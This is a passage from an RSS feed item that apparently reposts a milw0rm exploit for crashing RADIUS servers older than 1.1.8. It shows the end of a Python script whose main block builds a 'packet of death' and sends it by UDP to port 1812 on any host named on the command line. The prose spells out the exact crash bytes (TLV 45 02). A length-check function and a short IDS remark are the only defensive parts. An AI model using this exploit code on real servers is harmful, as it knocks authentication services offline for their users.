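    return any(MIN_ATTR_LEN.get(t, 2) > l for t, l, _ in attrs)


def send_packet(host, packet, port=1812, sport=60422):
    """Fire the datagram from the advisory's source port; a crashed server sends nothing back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.bind(("", sport))
        s.sendto(packet, (host, port))


if __name__ == "__main__":
    import sys
    pod = packet_of_death()
    print("packet of death (%d bytes): %s" % (len(pod), pod.hex()))
    print("flagged by length check:", is_packet_of_death(pod))
    if len(sys.argv) == 2:      # only send when a target is given explicitly
        send_packet(sys.argv[1], pod)
```

On the wire this is the same 22 bytes scapy emits: a 20-byte header followed by the two-octet TLV 45 02. Feeding is_packet_of_death() the attribute bytes of captured Access-Requests is a cheap pre-filter for a RADIUS proxy or IDS rule while servers older than 1.1.8 are still in service.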

</pre><br />
<br />
Source: <a href='http://www.milw0rm.com/exploits/9642' class='bbc_url' title='External link' rel='nofollow external'>http://www.milw0rm.com/exploits/9642</a>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:34:23 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32228</guid>
	</item>
</channel>
</rss>